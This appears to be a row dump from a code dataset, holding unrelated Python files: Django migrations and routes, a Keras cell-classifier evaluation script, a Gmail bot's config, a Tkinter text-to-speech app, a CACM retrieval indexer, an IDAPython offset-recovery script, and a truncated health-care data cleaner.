text stringlengths 8 6.05M |
|---|
# Generated by Django 3.0.1 on 2020-01-09 16:24
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated migration: renames the ``title`` field to ``name`` on
    # both the Category and Product models of the shopUser app.
    # Do not edit operations by hand; order is significant to the autodetector.

    dependencies = [
        ('shopUser', '0011_auto_20200109_1623'),
    ]

    operations = [
        migrations.RenameField(
            model_name='category',
            old_name='title',
            new_name='name',
        ),
        migrations.RenameField(
            model_name='product',
            old_name='title',
            new_name='name',
        ),
    ]
|
import socket
import sys
import json

# Simple TCP demo client: receive one JSON message from a local server,
# acknowledge it, and print the decoded payload.
host = 'localhost'
port = 8003

# ``with`` guarantees the socket is closed even if recv/decoding/parsing
# raises; the original manual s.close() was skipped on any exception.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((host, port))
    # NOTE(review): a single recv(1024) assumes the whole JSON document
    # arrives in one segment -- fine for this demo, not a general framing
    # strategy.
    data = s.recv(1024)
    data = data.decode("utf-8")
    s.send(b'Thank you from client')
    dataj = json.loads(data)
    print(type(dataj))
    print(dataj)
|
import os
import cv2
import sys
import numpy as np
from keras import applications
from keras.models import Model, load_model, Sequential
from keras.layers import GlobalAveragePooling2D, Dropout, Dense
from train_inception import encode_labels, standardize_data, shuffle_data
from keras.preprocessing.image import ImageDataGenerator
from PIL import Image
import itertools
import matplotlib.pyplot as plt
from sklearn.metrics import confusion_matrix, classification_report
from sklearn.utils.multiclass import unique_labels
# def load_examples(dir, max_examples, resize_height, resize_width):
#     """ Loads un-labeled data from directory dir into a global data list.
#     max_examples defines the maximum number of images to import.
#     """
#     for idx, i in enumerate(os.listdir(dir)):
#         if idx == max_examples: # only read max_examples number of examples
#             break
#         img = cv2.imread(dir + "/" + i)
#         img = cv2.resize(img, (resize_height, resize_width))
#         # append data to array
#         assert(data[idx,:,:,:].shape == img.shape) # asserts image matrix is of the intended shape, and fits data matrix
#         data[idx,:,:,:] = img # add the array to data
#     return data
def plot_confusion_matrix(cm, classes,
                          normalize=False,
                          title='Confusion matrix',
                          cmap=plt.cm.Blues):
    """Render a confusion matrix as an annotated matplotlib image.

    cm        -- square confusion matrix (numpy array)
    classes   -- axis tick labels, one per class
    normalize -- if True, display per-row fractions instead of raw counts
    cmap      -- matplotlib colormap for the image
    """
    if normalize:
        cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
        print("Normalized confusion matrix")
    else:
        print('Confusion matrix, without normalization')
    print(cm)

    plt.imshow(cm, interpolation='nearest', cmap=cmap)
    plt.title(title)
    plt.colorbar()
    ticks = np.arange(len(classes))
    plt.xticks(ticks, classes, rotation=45)
    plt.yticks(ticks, classes)

    # Annotate each cell; switch text color past half the max for contrast.
    value_fmt = '.2f' if normalize else 'd'
    cutoff = cm.max() / 2.
    for row, col in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
        plt.text(col, row, format(cm[row, col], value_fmt),
                 horizontalalignment="center",
                 color="white" if cm[row, col] > cutoff else "black")

    plt.tight_layout()
    plt.ylabel('True label')
    plt.xlabel('Predicted label')
if __name__ == "__main__":
    """ The file can run on two modes:
    1. Validation: imports labeled examples, and runs a validation through the model.
    Prints the accuracy. Creates a confusion matrix
    2. Prediction: imports un-labeled examples, and runs predictions using the model.
    Prints the predicted label
    """
    # Trained checkpoint and labeled test images.
    model_path = "/home/nyscf/Documents/sarita/cell-classifier/model_resnet_mb10_m4135_e100_do0.4/chkpt_model.32-acc0.82.hdf5"
    test_data_dir = "/home/nyscf/Documents/test_images/"
    img_size = (224,224)
    num_examples_to_load = 22
    valid_batch_size = 1
    # Rescale pixels to [0, 1]; shuffle=False keeps predictions aligned with
    # test_generator.classes used as y_true below.
    test_datagen = ImageDataGenerator(rescale=1./255)
    test_generator = test_datagen.flow_from_directory(test_data_dir,
                                                      target_size=img_size,
                                                      batch_size=valid_batch_size,
                                                      class_mode='binary',
                                                      shuffle = False)
    print("datagen created")
    # Rebuild the architecture (ResNet50 base + GAP + 1-unit sigmoid head)
    # and load the trained weights into it.
    base_model = applications.resnet50.ResNet50(include_top=False, weights=None,
                                                input_shape = (img_size[0], img_size[1], 3), classes=2)
    top_model = Sequential()
    top_model.add(Dense(1, activation='sigmoid'))
    output_layer = base_model.output
    output_layer = GlobalAveragePooling2D()(output_layer)
    # top_model.add(output_layer)
    model = Model(inputs=base_model.input, outputs=top_model(output_layer))
    model.load_weights(model_path)
    model.compile(loss = "binary_crossentropy", optimizer = 'adam', metrics = ["acc"]) #used accuracy metric for 2 classes, supposedly catetgorical acc gets selected automatically when using cat cross ent
    prob = model.predict_generator(test_generator, steps=num_examples_to_load, verbose=1)
    print(prob)
    # FIX: np.int was deprecated in NumPy 1.20 and removed in 1.24; the
    # builtin int is the documented replacement and is behaviorally identical.
    # NOTE(review): ``prob < 0.5`` treats LOW sigmoid scores as the positive
    # class -- confirm this matches the label encoding used at training time.
    y_pred = (prob < 0.5).astype(int)
    # y_pred = np.argmax(prob, axis=1)
    print("y_pred: ", y_pred)
    y_true = test_generator.classes
    print("y_true: ", y_true)
    target_names = ['bad','viable']
    print(classification_report(y_true, y_pred, target_names=target_names))
    cm = confusion_matrix(y_true, y_pred)
    print(cm)
    # Plot non-normalized confusion matrix
    plot_confusion_matrix(cm, classes=target_names,
                          title='Confusion matrix, without normalization')
    plt.show()
    """
    if sys.argv[1] == "predict":
        model_path = "/home/nyscf/Documents/sarita/cell-classifier/model_resnet_mb10_m4135_e100_doNone_preprocessing/chkpt_model.28-acc0.92.hdf5"
        image_path = "/home/nyscf/Documents/test_images/bad"
        img_size = (224,224)
        num_examples_to_load = 13
        image_gen = ImageDataGenerator()
        gen = image_gen.flow_from_directory(image_path, batch_size=1)
        index=0
        image, label = gen._get_batches_of_transformed_samples(np.array([index]))
        image_name = gen.filenames[index]
        data = np.empty((num_examples_to_load, img_size[0], img_size[1], 3), dtype=np.uint8)
        data = load_examples(image_path, num_examples_to_load, img_size[0], img_size[1])
        # model = create_model()
        # model.load_weights(model_path)
        loaded_model = load_model(model_path)
        predictions = loaded_model.predict(data)
        viable_tag = predictions[0]
        correct_pred = 0
        incorrect_pred = 0
        print(predictions.shape)
        print(str(predictions))
        prediction_csv = pd.DataFrame(predictions, columns=['predictions']).to_csv('/home/nyscf/Documents/test_images/predictions.csv')
    """
# File-system locations for credentials, cached state, and log files.
CLIENT_SECRET_FILE_PATH = "secrets/client_secret.json"
SEEN_EMAIL_DATA_FILE_PATH = "data/seen_email_data.json"
UNUSED_VOTERS_FILE_PATH = "data/unused_voters.json"
ERROR_LOG_FILE_PATH = "logs/error_log.txt"
ROUTINE_ACTION_LOG_FILE_PATH = "logs/routine_log.txt"
ABNORMAL_ACTION_LOG_FILE_PATH = "logs/abnormal_log.txt"
IGNORE_LOG_FILE_PATH = "logs/ignored_log.txt"
# Gmail OAuth scopes: read, send, and modify messages.
SCOPES = ['https://www.googleapis.com/auth/gmail.readonly',
          'https://www.googleapis.com/auth/gmail.send',
          'https://www.googleapis.com/auth/gmail.modify']
# Number of voter records included per outgoing email.
NUMBER_OF_VOTERS_TO_SEND = 10
def read_file(file_path):
    """Return the full contents of *file_path* as a string.

    The file is opened with an explicit UTF-8 encoding so the result does
    not depend on the platform's default locale encoding (the bot message
    templates this loads may contain non-ASCII text).
    """
    with open(file_path, encoding="utf-8") as f:
        return f.read()
# Shared disclaimer prepended to every outgoing bot message.
base = read_file('secrets/bot_messages/disclaimer_prefix.txt') + '\n\n'

# Canned replies, loaded once at import time from the secrets folder.
BOT_MESSAGES = dict(
    MESSAGE_FOR_ASKING_IF_PEOPLE_WANT_MORE=base + read_file('secrets/bot_messages/message_for_asking_if_people_want_more.txt'),
    MESSAGE_WHEN_BOT_DOESNT_UNDERSTAND=base + read_file('secrets/bot_messages/message_when_bot_doesnt_understand.txt'),
    MESSAGE_WHEN_SENDING_VOTERS=base + read_file('secrets/bot_messages/message_when_sending_voters.txt'),
    MESSAGE_WHEN_SOMEONE_CANT_MAIL_THEIR_VOTERS=base + read_file('secrets/bot_messages/message_when_someone_cant_mail_their_voters.txt'),
)

# DON'T CHANGE THE ORDER OF THESE
VOTER_DATA_FIELDS = ['name', 'street_address', 'apt_number', 'zip_code', 'city']
|
# Generated by Django 2.2.2 on 2019-06-08 09:24
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: adds an ``active`` boolean flag (default True)
    # to the Showtimes model of myapp.

    dependencies = [
        ('myapp', '0003_auto_20190607_1502'),
    ]

    operations = [
        migrations.AddField(
            model_name='showtimes',
            name='active',
            field=models.BooleanField(default=True),
        ),
    ]
|
from django.urls import path
from rest_framework.routers import DefaultRouter
from user.views import UserViewSet, AuthView, Logout, RetrieveCountryCityView

# Router-generated CRUD routes for users (no trailing slashes).
router = DefaultRouter(trailing_slash=False)
router.register('users', UserViewSet, basename='users')

# Router routes first, then the hand-written auth/data endpoints --
# same resolution order as before.
urlpatterns = [
    *router.urls,
    path('login', AuthView.as_view(), name='login'),
    path('logout', Logout.as_view()),
    path('country_data', RetrieveCountryCityView.as_view(), name="country_data"),
]
|
Your input
"the sky is blue"
Output
"blue is sky the"
Expected
"blue is sky the"
Your input
"poetry lover"
Output
"lover poetry"
Expected
"lover poetry" |
# import libraries
from tkinter import *
from gtts import gTTS
from playsound import playsound
# Create window
# Create window
root = Tk()
root.geometry("600x300")
root.config(bg="white")
root.title("TEXT TO SPEECH")

# Bottom heading.  FIX: pack() returns None, so the original
# ``Label(...).pack(...)`` chain stored None in these variables; keep the
# widget reference and pack on a separate line.
bottom_label = Label(root, text="text to speech app", font="arial 20 italic",
                     bg="yellow")
bottom_label.pack(fill=X, side=BOTTOM)

# Search label
top_label = Label(root, text="ENTER TEXT BELOW", font="arial 20 bold underline",
                  bg="yellow")
top_label.pack(fill=X, side=TOP)

# Text variable bound to the entry widget.
Msg = StringVar()

# Entry.  FIX: "aerial" was a typo for the Arial font family, which made Tk
# fall back to a default font.
entry_field = Entry(root, textvariable=Msg, font="arial 35 bold")
entry_field.pack(fill=X)
# Define function
def text_to_speech():
    """Read the entry field, synthesize it with gTTS, and play the MP3."""
    message = entry_field.get()
    speech = gTTS(text=message)
    speech.save("test.mp3")  # overwritten on every click
    playsound("test.mp3")
def close():
    """Destroy the root window, ending the mainloop and the program."""
    root.destroy()
def clear():
    """Empty the entry field by resetting its bound StringVar."""
    Msg.set("")
# Button
Button(root, text="PLAY", font="arial 25 bold", command=text_to_speech, bg="light green").pack(fill=X)
Button(root, text="CLEAR", font="arial 25 bold", command=clear, bg="orange").pack(fill=X)
Button(root, text="EXIT", font="arial 25 bold", command=close, bg="Red").pack(fill=X)
# Infinite loop to run program
root.mainloop()
|
'''Es un error en tiempo de ejecucion: la sintaxis del codigo es correcta, pero durante la ejecucion ha ocurrido "algo inesperado". '''
'''El problema es que en los lenguajes que ejecutan el codigo hacia abajo, una vez que el programa nos da error el resto de lineas no se ejecutan. '''
def suma(num1,num2):
    """Return num1 plus num2."""
    resultado = num1 + num2
    return resultado
def resta(num1,num2):
    """Return num1 minus num2."""
    resultado = num1 - num2
    return resultado
def multiplicacion(num1,num2):
    """Return num1 multiplied by num2."""
    resultado = num1 * num2
    return resultado
def divide(num1,num2):
    """Divide num1 by num2; on division by zero, warn and return an error string."""
    try:
        cociente = num1 / num2
    except ZeroDivisionError:
        print("No se puede vividir entre 0")
        return "Operacion erronea"
    return cociente
# Keep prompting until both operands parse as integers; a ValueError from
# int() just re-runs the loop instead of crashing the program.
while(True):
    try:
        op1=(int(input("introduce el primer valor: ")))
        op2=(int(input("introduce el segundo valor: ")))
        break
    except ValueError:
        print("Los valores intorducidos no son correctos ")
# Dispatch on the operation name typed by the user.
operacion=input("introduce la operacion a realizar(suma, resta, multiplicacion, divide)")
if operacion =="suma":
    print(suma(op1,op2))
elif operacion == "resta":
    print(resta(op1,op2))
elif operacion == "multiplicacion":
    print(multiplicacion(op1,op2))
elif operacion == "divide":
    print(divide(op1,op2))
else :
    print(f"Operacion no contemplada ")
# Demonstrates that execution continues after a handled error.
print("Ejecucion del programa finalizada : continua con el progra")
#! /usr/bin/env python
from collections import Counter
from bs4 import BeautifulSoup
from RetrievalModel import TfIdf, CosineSimilarity, BM25
import os
import glob
import operator
class Retriever:
    """Builds an inverted index over the CACM corpus and runs ranked
    retrieval (TF-IDF, cosine similarity, or BM25) for a set of queries.

    NOTE(review): Python 2 code (print statements, 0755 octals).  Most
    methods os.chdir() into a corpus folder and chdir back with '..' --
    they assume the process CWD is the project root throughout.
    """
    def __init__(self):
        # Stateless; all data is read from disk on demand.
        return

    def get_corpus(self, req=True):
        """Thin wrapper around build_index(); returns its (index, corpus) pair."""
        corpus = self.build_index(req)
        return corpus

    def get_total_corpus(self, folder='clean'):
        """Load every document of the chosen folder as {docid: [tokens]}.

        folder -- 'clean' for ./clean_cacm, anything else for ./stopped_cacm.
        """
        cwd = os.getcwd()
        if folder == 'clean':
            fol = os.path.join(cwd, 'clean_cacm')
        else:
            fol = os.path.join(cwd, 'stopped_cacm')
        os.chdir(fol)
        total_corpus = {}
        for eachfile in glob.glob('*.html'):
            docid = eachfile[:-5]  # strip the '.html' suffix
            content = open(eachfile).read()
            content_as_list = content.split()
            total_corpus[docid] = content_as_list
        os.chdir('..')
        return total_corpus

    def clean_corpus(self):
        """Strip HTML from every file in ./cacm and write the cleaned text
        into ./clean_cacm, creating either folder if it does not exist."""
        cwd = os.getcwd()
        cacm = os.path.join(cwd, 'cacm')
        clean_cacm = os.path.join(cwd, 'clean_cacm')
        if not os.path.exists(cacm):
            # No raw corpus: create the folder and bail out.
            print "Corpus doesn't exist. It is created now. " \
                  "PLease put raw files inside the corpus folder"
            os.makedirs(cacm, 0755)
            return
        if not os.path.exists(clean_cacm):
            os.makedirs(clean_cacm, 0755)
        os.chdir(cacm)
        for eachfile in glob.glob('*.html'):
            content = open(eachfile).read()
            content = BeautifulSoup(content, 'html.parser')
            content = content.get_text().encode('utf-8')
            clean_content = self.clean_content(content, True)
            clean_file = open(os.path.join(clean_cacm, eachfile), 'w')
            clean_file.write(clean_content)
            clean_file.close()

    def clean_content(self, content, not_query):
        """Normalize raw text: drop punctuation, lower-case, and (for
        documents) truncate after the last AM/PM timestamp token.

        not_query -- True for corpus documents, False for query strings.
        Returns the cleaned tokens re-joined by single spaces.
        """
        ignore_list = ['!', '@', '#', '$', '^', '&', '*', '(', ')', '_', '+', '=', '{', '[', '}', ']', '|',
                       '\\', '"', "'", ';', '/', '<', '>', '?', '%']
        # Python-2 str.translate with table None deletes every listed char.
        content = content.translate(None, ''.join(ignore_list))
        content = content.replace(':', ' ')
        content = content.replace('-', ' ')
        content = content.split()
        last = 0
        if not_query:
            # CACM documents end with a timestamp; keep tokens up to the
            # last one containing AM/PM.
            for i, v in enumerate(reversed(content)):
                if 'AM' in v or 'PM' in v:
                    last = len(content) - i - 1
                    break
            content = content[0:last+1]
        final_content = ''
        for eachword in content:
            if len(eachword) > 1 and eachword[0] == '-':
                eachword = eachword[1:]
            eachword = eachword.lower()
            eachword = eachword.strip('.,-')
            if eachword == '-':
                continue
            final_content += eachword + ' '
        return final_content

    def build_index(self,need_index=True, folder='clean'):
        """Return (inverted_index, total_corpus) built from the folder.

        inverted_index maps token -> {docid: term frequency}; total_corpus
        maps docid -> token list.  When need_index is False, the index
        construction is skipped but the corpus dict is still built.
        """
        cwd = os.getcwd()
        if folder == 'clean':
            fol = os.path.join(cwd, 'clean_cacm')
        else:
            fol = os.path.join(cwd, 'stopped_cacm')
        os.chdir(fol)
        inverted_index = {}
        total_corpus = {}
        for eachfile in glob.glob('*.html'):
            docid = eachfile[:-5]
            content = open(eachfile).read()
            content_as_list = content.split()
            total_corpus[docid] = content_as_list
            if not need_index:
                continue
            # Per-document term frequencies feed the postings entries.
            word_count = dict(Counter(content_as_list))
            for token in content_as_list:
                if token not in inverted_index:
                    temp = dict()
                    temp[docid] = word_count[token]
                    inverted_index[token] = temp
                else:
                    temp = inverted_index[token]
                    temp[docid] = word_count[token]
                    inverted_index[token] = temp
        os.chdir('..')
        return inverted_index, total_corpus

    def run_all_queries(self, inverted_index, total_corpus, relevance_data,
                        query_dict, model='bm25', task_id='', notes='', store_queries ='', ret=False):
        """Score every query with the chosen model and emit TREC-style runs.

        model -- 'tfidf', 'cosine', or anything else for BM25 (default).
        ret   -- if True, return the (query_id, docid, rank, score, model)
                 tuples instead of writing result files.
        Writes top-100 results per query into task<task_id>/ and all_runs/.
        """
        results = []
        bm = BM25(inverted_index, total_corpus, relevance_data)
        tf_idf = TfIdf(inverted_index, total_corpus)
        cosine = CosineSimilarity(inverted_index, total_corpus)
        for query_id in query_dict:
            query = self.clean_content(query_dict[query_id], False)
            if model == 'tfidf':
                ranks = tf_idf.get_tf_idf(query)
            elif model == 'cosine':
                ranks = cosine.get_cosine_similarity(query)
            else:
                ranks = bm.calculate_bm25(query, query_id)
            # Keep only the 100 highest-scoring documents per query.
            sorted_results = sorted(ranks.items(), key=operator.itemgetter(1), reverse=True)
            sorted_results = sorted_results[:100]
            rank = 1
            for each in sorted_results:
                tup = (query_id, each[0], rank, each[1], model)
                results.append(tup)
                rank += 1
        if ret:
            return results
        result_file_name = 'task'+task_id+'_'+model+"_"+notes+'.txt'
        if task_id == '':
            task_folder = os.getcwd()
        else:
            task_folder = os.path.join(os.getcwd(), 'task'+task_id)
        if not os.path.exists(task_folder):
            os.makedirs(task_folder, 0755)
        all_runs = os.path.join(os.getcwd(), 'all_runs')
        if not os.path.exists(all_runs):
            os.makedirs(all_runs, 0755)
        if store_queries != '':
            # Optionally dump the raw queries alongside the results.
            query_file_name = store_queries+"_queries.txt"
            qf = open(os.path.join(task_folder, query_file_name), 'w')
            for each in query_dict:
                qf.write("{} {}\n".format(str(each), query_dict[each]))
        # Write the run twice: once per-task, once in the shared all_runs dir.
        f1 = open(os.path.join(task_folder, result_file_name), 'w')
        f2 = open(os.path.join(all_runs, result_file_name), 'w')
        for each in results:
            f1.write('{} {} {} {} {} {}\n'.format(each[0], 'Q0', each[1], each[2], each[3], model))
            f2.write('{} {} {} {} {} {}\n'.format(each[0], 'Q0', each[1], each[2], each[3], model))
        f1.close()
        f2.close()
|
from django.contrib import admin
from .models import Blog
class BlogAdmin(admin.ModelAdmin):
    # (translated) controls which fields are accessible in the admin form
    # fields=['title','content']
    fieldsets = [
        ('title', {'fields': ['title']}),
        ('content information',{'fields': ['content', 'author']}),
        ('image', {'fields':['image']}),
    ]
    # Columns shown in the change list, and fields searched by the search box.
    list_display=['title' ,'content', 'date']
    search_fields=['title' , 'content']

admin.site.register(Blog , BlogAdmin)
from idc import *
from idautils import *
from Tkinter import Tk
from operator import itemgetter
from collections import OrderedDict
import idaapi
import random
# Cap on how many xrefs to sample per function (-1 disables the cap).
MAX_XREFS = 500
# nameOfOffset -> resolved offset, filled in by CreateOffsets.
Offsets = {}
# function EA -> cached base-offset string, filled in by FindBaseOffsetValue.
BaseOffsets = {}
def FindCallOffsetValue(address):
    """Walk backwards from *address* through the disassembly to recover a
    base+sub offset built across a call, returning base+sub as an int or
    None if either part could not be parsed as hex.

    NOTE(review): IDAPython (IDA Pro) script; relies on idc/idautils
    globals imported with ``from idc import *``.
    """
    trueOffset = None
    baseOffset = ""
    subOffset = ""
    leadAddy = ""
    secondReg = ""
    thirdReg = ""
    i = 0
    # Scan up to 15 instructions backwards from the starting address.
    while i < 15:
        address = idc.prev_head(address, minea=0)
        currentInstruction = generate_disasm_line(address, 0)
        if i == 1:
            leadAddy = print_operand(address, 0)
        if currentInstruction.find("mov " + leadAddy) != -1:
            secondReg = print_operand(address, 1)
        if currentInstruction.find("call") != -1:
            # Resolve the call target symbol and scan its first 8 instructions
            # for a "lea <secondReg>, [reg+offseth]" that yields the sub-offset.
            currentInstruction = currentInstruction.replace("call", "")
            currentInstruction = currentInstruction.replace(" ", "")
            nameOfAddress = get_name_ea_simple(currentInstruction)
            z = 0
            while z < 8:
                currentInstruction = generate_disasm_line(nameOfAddress, 0)
                if currentInstruction.find("lea " + secondReg) != -1:
                    temp = print_operand(nameOfAddress, 1)
                    additionSignIndex = temp.find("+")
                    thirdReg = temp[:additionSignIndex].replace("[", "")
                    subOffset = temp[additionSignIndex + 1:].replace("h]", "")
                nameOfAddress = idc.next_head(nameOfAddress)
                z = z + 1
            if thirdReg != "":
                # Look backwards for the lea that loads the base register.
                q = 0
                currentAddress = address
                while q < 8:
                    currentInstruction = generate_disasm_line(currentAddress, 0)
                    # NOTE(review): both sides of this ``or`` are identical --
                    # one side was probably meant to test a different pattern.
                    if currentInstruction.find("lea " + thirdReg) != -1 or currentInstruction.find("lea " + thirdReg) != -1:
                        temp = print_operand(currentAddress, 1)
                        additionSignIndex = temp.find("+") + 1
                        baseOffset = temp[additionSignIndex:].replace("h]", "")
                        break
                    currentAddress = idc.prev_head(currentAddress, minea=0)
                    q = q + 1
        i = i + 1
    try:
        # Both pieces are hex strings like "1A0"; any parse failure -> None.
        trueOffset = int(baseOffset, 16) + int(subOffset, 16)
    except ValueError:
        pass
    return trueOffset
def FindBaseOffsetValue(address, subOffset):
    """Recover the base offset for the function containing *address* by
    scanning its callers, cache it in BaseOffsets, and return
    base+subOffset as an int (or None when parsing fails).

    subOffset -- hex string (no trailing 'h') already extracted by the caller.
    """
    ea = get_name_ea_simple(get_func_name(address))
    xrefs = list(XrefsTo(ea, 0))
    # Ignore data-section references; only real call sites are useful.
    xrefs = list(filter(lambda xref: SegName(xref.frm) != ".rdata", xrefs))
    if MAX_XREFS != -1:
        xrefs = random.sample(xrefs, min(len(xrefs), MAX_XREFS))
    trueOffset = None
    baseOffset = ""
    leadAddy = ""
    # Heuristic: only attempt recovery for rarely-called functions.
    if len(xrefs) < 4:
        for xref in xrefs:
            caller = xref.frm
            i = 0
            # Scan up to 300 addresses backwards from each call site.
            while i < 300:
                caller = idc.prev_addr(caller)
                currentInstruction = print_insn_mnem(caller) + " " + print_operand(caller, 0)
                if i == 1:
                    leadAddy = print_operand(caller, 0)
                if currentInstruction.find("lea " + leadAddy) != -1:
                    temp = print_operand(caller, 1)
                    additionSignIndex = temp.find("+") + 1
                    baseOffset = temp[additionSignIndex:].replace("h]", "")
                    break
                i = i + 1
    # Cache even an empty result so later lookups can skip the scan.
    BaseOffsets[ea] = baseOffset
    try:
        trueOffset = int(baseOffset, 16) + int(subOffset, 16)
    except ValueError:
        pass
    return trueOffset
def CreateOffsets(address, currentAddress, leadAddy, i, checkPoint):
    """Scan backwards from a call site, pairing a pushed string name with a
    recovered offset, and record the pair in the global Offsets dict.

    Recurses through code cross-references when the current window yields
    only one half of the (name, offset) pair.  65535 is used as the
    "unknown offset" sentinel.
    """
    offset = None
    nameOfOffset = ""
    lastInstruction = ""
    while i < 8:
        address = idc.prev_head(address, minea=0)
        currentInstruction = generate_disasm_line(address, 0)
        # Stop when we walk past the start of the previous function
        # (retn followed by alignment padding).
        if lastInstruction == "align 10h":
            if currentInstruction == "retn 4":
                break
        lastInstruction = currentInstruction
        if currentInstruction.find("push offset ") != -1:
            # "push offset aSomeString ; comment" -> read the string literal.
            currentInstruction = currentInstruction.replace("push offset ", "")
            endIndex = currentInstruction.find(";")
            currentInstruction = currentInstruction[:endIndex]
            addressOfName = get_name_ea_simple(currentInstruction)
            nameOfOffset = GetString(addressOfName, -1, 0)
        if i == checkPoint:
            # Skip over register pushes when deciding which operand leads.
            if currentInstruction.find("push edi") == -1 and currentInstruction.find("push esi") == -1 and currentInstruction.find("push ebp") == -1 and currentInstruction.find("push ebx") == -1 and currentInstruction.find("push esp") == -1:
                checkPoint = checkPoint + 1
            else:
                instructionBeforeLine = generate_disasm_line(idc.prev_head(address, minea=0), 0)
                if instructionBeforeLine.find("push edi") == -1 and instructionBeforeLine.find("push esi") == -1 and instructionBeforeLine.find("push ebp") == -1 and instructionBeforeLine.find("push ebx") == -1 and instructionBeforeLine.find("push esp") == -1:
                    leadAddy = print_operand(address, 0)
                else:
                    checkPoint = checkPoint + 1
        if currentInstruction.find("add ") != -1:
            # "add reg, <subOffset>h": combine with the function's base offset.
            temp = print_operand(address, 1)
            additionSignIndex = temp.find("+") + 1
            subOffset = temp[additionSignIndex:].replace("h", "")
            functionAddress = get_name_ea_simple(get_func_name(address))
            trueOffset = None
            if int(subOffset, 16) < 1024:
                if functionAddress in BaseOffsets:
                    try:
                        trueOffset = int(BaseOffsets.get(functionAddress), 16) + int(subOffset, 16)
                    except ValueError:
                        pass
                    if trueOffset != None:
                        offset = trueOffset
                if trueOffset == None:
                    offset = FindBaseOffsetValue(address, subOffset)
            else:
                # Large immediates are taken as the full offset directly.
                offset = int(subOffset, 16)
        if currentInstruction.find("lea " + leadAddy) != -1:
            temp = print_operand(address, 1)
            additionSignIndex = temp.find("+") + 1
            if currentInstruction.find("h") != -1:
                offset = temp[additionSignIndex:].replace("h]", "")
                offset = int(offset, 16)
            else:
                break
        # 4294967295 == BADADDR (0xFFFFFFFF): no code reference to here.
        if get_first_fcref_to(address) != 4294967295:
            testAddressForCall = get_first_fcref_to(address)
            if generate_disasm_line(testAddressForCall, 0).find("call") == -1:
                if offset == None or nameOfOffset == "":
                    # Missing half of the pair -- try again from the referrer.
                    CreateOffsets(testAddressForCall, testAddressForCall, leadAddy, i, checkPoint)
                elif offset != None and nameOfOffset != "":
                    break
        i = i + 1
    if nameOfOffset == "":
        nameOfOffset = "NO NAME"
    if offset == None:
        if nameOfOffset != "NO NAME":
            offset = FindCallOffsetValue(currentAddress)
        if offset == None:
            offset = 65535
    # Record the result, preferring real offsets over the 65535 sentinel.
    if nameOfOffset not in Offsets:
        if nameOfOffset != "NO NAME":
            if offset != 65535:
                Offsets[nameOfOffset] = offset
    else:
        if nameOfOffset != "NO NAME":
            if Offsets.get(nameOfOffset) == 65535:
                Offsets[nameOfOffset] = offset
            if offset != 65535:
                Offsets[nameOfOffset] = offset
def GenerateList(ea):
    """Run CreateOffsets over every code cross-reference to *ea*, populating
    the global Offsets mapping."""
    xrefs = list(XrefsTo(ea, 0))
    # Skip data-section references; only actual call/jump sites matter.
    xrefs = list(filter(lambda xref: SegName(xref.frm) != ".rdata", xrefs))
    for xref in xrefs:
        address = xref.frm
        currentAddress = address
        checkPoint = 1
        i = 0
        leadAddy = ""
        CreateOffsets(address, currentAddress, leadAddy, i, checkPoint)
|
import pandas as pd
import numpy as np
import inquirer
import math
from ..config.config import Config
from matplotlib import pyplot as plt
from collections import Counter
from sklearn.linear_model import LinearRegression
from sklearn.neighbors import KNeighborsRegressor
from sklearn.preprocessing import LabelEncoder
class HealthCareManager:
    """Interactive manager for the health-care (stroke) dataset: either plots
    exploratory charts, or produces four differently-cleaned copies of the
    data (column drop / mean fill / linear-regression fill / KNN fill)."""

    def __init__(self):
        # Project configuration (provides the CSV path) and the CLI menu.
        self.config = Config()
        self._choices = ["Analyze data", "Clean Data"]
        self._questions = [
            inquirer.List(
                "options",
                message="Which part of the first question",
                choices=self._choices,
            ),
        ]

    def initialize(self):
        """Prompt the user and dispatch to analysis or cleaning."""
        answer = inquirer.prompt(self._questions)
        if answer["options"] == self._choices[0]:
            self.analyze_data()
        elif answer["options"] == self._choices[1]:
            matrices = self.clean_data()
        else:
            exit(0)

    # To Do -> CLEAN UP
    def analyze_data(self):
        """Reads the data file from config and plots summary charts."""
        data = pd.read_csv(self.config.health_care_csv_path)
        # Replace boolean values to be verbose
        # TO DO -> Do it with pandas replace methods
        data["stroke"] = ["No stroke" if x == 0 else "Had a stroke" for x in data["stroke"]]
        data["hypertension"] = ["No hypertension" if x == 0 else "Had hypertension" for x in data["hypertension"]]
        data["ever_married"] = ["Never married" if x == "No" else "Has Married Before" for x in data["ever_married"]]
        data["heart_disease"] = ["No heart disease" if x == 0 else "Had heart disease" for x in data["heart_disease"]]
        # Create counters for all enumerable data (everything but the
        # continuous columns and the row id).
        data_keys, data_values = [], []
        enumerable_counters = {}
        for key in data.drop(["age", "avg_glucose_level", "bmi", "id"], axis="columns"):
            enumerable_counters[key] = Counter(data[key]).most_common()
            for item in enumerable_counters[key]:
                data_keys.append(item[0])
                data_values.append(item[1])
        # Enumerable Groupings of People: horizontal bars as % of all rows.
        _, groupings_axes = plt.subplots()
        groupings_axes.barh(data_keys, [(x / len(data)) * 100 for x in data_values])
        groupings_axes.set_title("Percentage of people in enumerable groupings")
        groupings_axes.set_xlabel("Percentage of People")
        groupings_axes.set_ylabel("Enumerable Groupings of People")
        # Scatter plot for age and glucose, colored by BMI.
        _, scatter = plt.subplots()
        im = scatter.scatter(
            data["age"],
            data["avg_glucose_level"],
            c=data["bmi"],
            cmap="Greens",
            edgecolors="black",
            linewidth=1,
            alpha=0.75,
        )
        scatter.set_title("Age in relation with Average Glucose Level")
        scatter.set_xlabel("Age")
        scatter.set_ylabel("Average Glucose Level")
        clb = plt.colorbar(im)
        clb.ax.tick_params(labelsize=8)
        clb.ax.set_title("BMI", fontsize=8)
        # Enumerable percentages: one pie chart per categorical column.
        # TO DO -> Make size dynamic
        _, pie_axes = plt.subplots(nrows=2, ncols=4)
        for i, item in enumerate(enumerable_counters):
            pie_axes[math.floor(i / 4)][i % 4].pie(
                [x[1] for x in enumerable_counters[item]], labels=[x[0] for x in enumerable_counters[item]]
            )
            pie_axes[math.floor(i / 4)][i % 4].set_title(item)
        plt.show()

    def clean_data(self):
        """Runs the second question and cleans data.

        Returns four DataFrames cleaned with, in order: column removal,
        mean imputation, linear-regression imputation, KNN imputation.
        """
        # Replace the unknown values of the smoking columns as nan, so pandas can auto remove
        data = pd.read_csv(self.config.health_care_csv_path, na_values=["Unknown"])
        # Method ONE: Remove columns
        removed_column_method = data.copy()
